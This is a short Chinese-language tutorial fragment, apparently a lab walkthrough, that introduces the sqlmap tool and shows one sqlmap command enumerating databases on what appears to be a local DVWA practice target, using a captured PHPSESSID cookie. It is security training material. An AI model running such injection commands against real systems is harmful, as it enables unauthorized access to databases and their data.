一、工具介绍
sqlmap + python2.7
sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞,具体工具可以到https://github.com/sdc5730399/information-security下载
二、爆破过程
获取PHPSESSID,如下图所示
爆数据库
D:\信息安全\sqlmap\sqlmapproject-sqlmap-dd450b5>python sqlmap.py -u "http://192.168.216.133/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=j9e9rjbjirtahsl4u45rahbbt1; security=low" --dbs --batch